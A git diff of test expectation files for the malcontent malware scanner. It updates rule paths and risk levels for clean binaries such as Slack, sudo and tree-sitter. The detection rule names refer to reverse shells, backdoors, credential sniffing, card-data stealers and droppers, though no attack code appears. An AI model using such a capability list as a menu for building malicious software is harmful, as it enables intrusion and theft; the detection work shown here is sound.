@@ -36,14 +37,13 @@ fs/path/usr_local: medium fs/path/var: low fs/path/var_log: medium fs/watch: low -impact/exploit: high +impact/exploit: medium impact/infection/infected: medium impact/remote_access/agent: medium -impact/remote_access/backdoor: high +impact/remote_access/backdoor: medium impact/remote_access/reverse_shell: medium impact/remote_access/trojan: medium impact/rootkit: medium -impact/rootkit/refs: medium net/dns/servers: low net/dns/txt: low net/download/fetch: medium diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md index fea449489..961ab3556 100644 --- a/tests/linux/clean/slack.md +++ b/tests/linux/clean/slack.md @@ -9,9 +9,9 @@ | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#hex_parse) | converts hex data to ASCII | [Buffer.from(padded, 'hex')](https://github.com/search?q=Buffer.from%28padded%2C+%27hex%27%29&type=code) | | MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%s](http://%s)
[https://%s](https://%s) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[endpoint_port](https://github.com/search?q=endpoint_port&type=code)
[firstIp](https://github.com/search?q=firstIp&type=code)
[hIp](https://github.com/search?q=hIp&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[internalPort](https://github.com/search?q=internalPort&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[multi_port](https://github.com/search?q=multi_port&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[pIp](https://github.com/search?q=pIp&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[quiche_ip](https://github.com/search?q=quiche_ip&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[required_ip](https://github.com/search?q=required_ip&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code)
[xIp](https://github.com/search?q=xIp&type=code)
[yoIp](https://github.com/search?q=yoIp&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [server_address_](https://github.com/search?q=server_address_&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.4.4](https://github.com/search?q=8.8.4.4&type=code)
[8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) | | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#remote_control) | Uses terms that may reference remote control abilities | [remote control](https://github.com/search?q=remote+control&type=code) | -| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [server_address_](https://github.com/search?q=server_address_&type=code) | | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [dropper](https://github.com/search?q=dropper&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) | | MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code)
[LevelDBIterator](https://github.com/search?q=LevelDBIterator&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBPartitionedLock](https://github.com/search?q=LevelDBPartitionedLock&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[LevelDBScopesKey](https://github.com/search?q=LevelDBScopesKey&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[leveldbH](https://github.com/search?q=leveldbH&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code) | @@ -26,11 +26,13 @@ | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [macAddress](https://github.com/search?q=macAddress&type=code) | +| MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | | MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) | -| MEDIUM | [evasion/covert_location/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/covert-location/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/usr/lib/debug/.build-id](https://github.com/search?q=%2Fusr%2Flib%2Fdebug%2F.build-id&type=code) | +| MEDIUM | [evasion/file/location/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/usr/lib/debug/.build-id](https://github.com/search?q=%2Fusr%2Flib%2Fdebug%2F.build-id&type=code) | | MEDIUM | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace) | trace or modify system calls | [ptrace](https://github.com/search?q=ptrace&type=code) | | MEDIUM | 
[exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code)
[vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | @@ -85,7 +87,6 @@ | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | -| MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptProtocol](https://github.com/search?q=interceptProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | @@ -105,8 +106,9 @@ | LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) | | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [evasion/hijack_execution/LD_LIBRARY_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hijack_execution/LD_LIBRARY_PATH.yara#ld_library_path) | ld library path | [LD_LIBRARY_PATH](https://github.com/search?q=LD_LIBRARY_PATH&type=code) | @@ -141,7 +143,6 @@ | LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | | LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code)
[bssid](https://github.com/search?q=bssid&type=code) | -| LOW | [impact/exploit/GCONV_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/exploit/GCONV_PATH.yara#gconv_path) | references character conversion configuration | [GCONV_PATH](https://github.com/search?q=GCONV_PATH&type=code) | | LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [require('dns')](https://github.com/search?q=require%28%27dns%27%29&type=code) | | LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [resolv.conf](https://github.com/search?q=resolv.conf&type=code) | | LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | @@ -174,7 +175,5 @@ | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [Uses glibc thread local storage](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/slirp4netns.simple b/tests/linux/clean/slirp4netns.simple index 290ed36cd..f64d4c66c 100644 --- a/tests/linux/clean/slirp4netns.simple +++ b/tests/linux/clean/slirp4netns.simple @@ -1,4 +1,4 @@ -# linux/clean/slirp4netns: high +# linux/clean/slirp4netns: medium anti-behavior/LD_DEBUG: medium anti-behavior/LD_PROFILE: medium c2/addr/ip: medium 
@@ -9,12 +9,14 @@ credential/sniffer/bpf: medium discover/group/lookup: medium discover/network/interface_list: medium discover/network/mac_address: medium +discover/process/parent: low +discover/system/dev_full: low discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low -evasion/covert_location/dev_shm: medium -evasion/hidden_paths/var_run: medium +evasion/file/location/dev_shm: medium +evasion/file/location/var_run: medium evasion/hide_artifacts/pivot_root: medium evasion/hijack_execution/LD_LIBRARY_PATH: low evasion/logging/acct: low @@ -63,16 +65,13 @@ fs/tempdir/TMPDIR: low fs/unmount: low fs/watch: low hw/cpu: medium -impact/exploit/GCONV_PATH: low impact/reboot: low -impact/remote_access/reverse_shell: medium lateral/scan/tool: medium mem/anonymous_file: medium net/dns/reverse: medium net/dns/servers: low net/dns/txt: low net/download: medium -net/download/fetch: high net/ip/addr: medium net/ip/icmp: low net/ip/multicast_send: low @@ -102,7 +101,6 @@ process/groupid_set: low process/groups_set: low process/multithreaded: low process/namespace_set: low -process/parent_pid_get: low process/unshare: low process/userid_set: low sus/exclamation: medium diff --git a/tests/linux/clean/sonarlint-metadata.json.simple b/tests/linux/clean/sonarlint-metadata.json.simple index dfa4e21ef..1d4bcdb3f 100644 --- a/tests/linux/clean/sonarlint-metadata.json.simple +++ b/tests/linux/clean/sonarlint-metadata.json.simple @@ -13,8 +13,8 @@ crypto/uuid: medium data/encoding/json_decode: low data/encoding/json_encode: low discover/network/interface_list: medium -evasion/covert_location/dev_mqueue: medium -evasion/hidden_paths/hidden: medium +evasion/file/location/dev_mqueue: medium +evasion/file/prefix: medium exec/plugin: low exfil/stealer/credit_card: medium fs/file/copy: medium diff --git a/tests/linux/clean/sudo.simple b/tests/linux/clean/sudo.simple index 50c4fb0a8..e1de0184e 100644 --- a/tests/linux/clean/sudo.simple 
+++ b/tests/linux/clean/sudo.simple @@ -1,11 +1,12 @@ # linux/clean/sudo: medium credential/password: low discover/network/interface_list: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/process/parent: low +discover/system/cpu: low +discover/system/hostname: low discover/user/HOME: low -evasion/hidden_paths/hidden: medium -evasion/hidden_paths/var_tmp: medium +evasion/file/location/var_tmp: medium +evasion/file/prefix: medium evasion/process_injection/ptrace: medium exec/plugin: low exec/program: medium @@ -38,6 +39,5 @@ privesc/sudoers: low process/chroot: low process/groupid_set: low process/groups_set: low -process/parent_pid_get: low process/userid_set: low sus/intercept: medium diff --git a/tests/linux/clean/tracer.o.aarch64.simple b/tests/linux/clean/tracer.o.aarch64.simple index 5190dad6d..1864ab728 100644 --- a/tests/linux/clean/tracer.o.aarch64.simple +++ b/tests/linux/clean/tracer.o.aarch64.simple @@ -1,7 +1,6 @@ # linux/clean/tracer.o.aarch64: medium c2/addr/ip: medium collect/databases/mysql: medium -credential/sniffer/bpf: medium discover/network/netstat: medium evasion/bypass_security/linux/iptables: medium evasion/logging/acct: low @@ -13,3 +12,4 @@ net/socket/listen: medium net/socket/receive: low net/socket/send: low net/tcp/synflood: medium +persist/kernel_module/symbol_lookup: low diff --git a/tests/linux/clean/tree-sitter.md b/tests/linux/clean/tree-sitter.md index 80a679dae..f398b39de 100644 --- a/tests/linux/clean/tree-sitter.md +++ b/tests/linux/clean/tree-sitter.md 
@@ -1,46 +1,46 @@ ## linux/clean/tree-sitter [🛑 HIGH] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|-------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------| -| HIGH | [exec/shell/tmp_semicolon](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/tmp_semicolon.yara#semicolon_short_tmp) | unusual one-liners involving /tmp | [--;/tmp/rust-20241004-6494-uljaw4/rustc-1](https://github.com/search?q=--%3B%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1&type=code) | -| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | -| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | -| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | -| MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | powershell | [powershell](https://github.com/search?q=powershell&type=code) | -| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
